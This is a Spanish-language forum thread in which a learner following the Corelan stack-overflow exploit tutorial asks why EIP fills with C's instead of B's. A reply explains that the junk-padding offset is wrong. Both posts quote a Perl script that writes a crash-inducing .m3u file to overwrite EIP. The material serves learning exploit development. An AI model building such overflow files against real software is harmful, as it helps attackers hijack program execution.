confusion!

Iniciado por 0x3c, 11 Enero 2013, 09:49 AM

0 Miembros y 1 Visitante están viendo este tema.

0x3c

saludos estoy siguiendo estos tutoriales....

corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

el problema es que cuando llego a la parte que se debe llenar EIP con B's en vez de llenarse con B's se llena con C's...??? estare haciendo algo mal?


por cierto para llenar el EIP con B's en el tutorial aparece este codigo:


my $file= "eipcrash.m3u";
my $junk= "A" x 26094;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";


por cierto en el codigo que use cambie las letras por sus equivalentes en 'hexadecimal'..


saludos
Si Vis Pacem, Para Bellum.

Another Legend Has Fallen

ThePinkPanther

Cita de: 0x3c en 11 Enero 2013, 09:49 AM
saludos estoy siguiendo estos tutoriales....

corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

el problema es que cuando llego a la parte que se debe llenar EIP con B's en vez de llenarse con B's se llena con C's...??? estare haciendo algo mal?


por cierto para llenar el EIP con B's en el tutorial aparece este codigo:


my $file= "eipcrash.m3u";
my $junk= "A" x 26094;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";


por cierto en el codigo que use cambie las letras por sus equivalentes en 'hexadecimal'..


saludos
Eip se llena con c , porque esta mal la parte del codigo
print $FILE $junk.$eip.$espdata; , en sintaxis esto esta bien , porque llenar llena pero con C , porque no llega $junk al punto justo donde se sobreeescribe eip , fijate el punto justo donde EIP es sobreescrito , y modifica esto :

my $junk= "A" x 26094;

por :  "A" x "EL numero entero justo -1 donde se escribe EIP."

Saludos.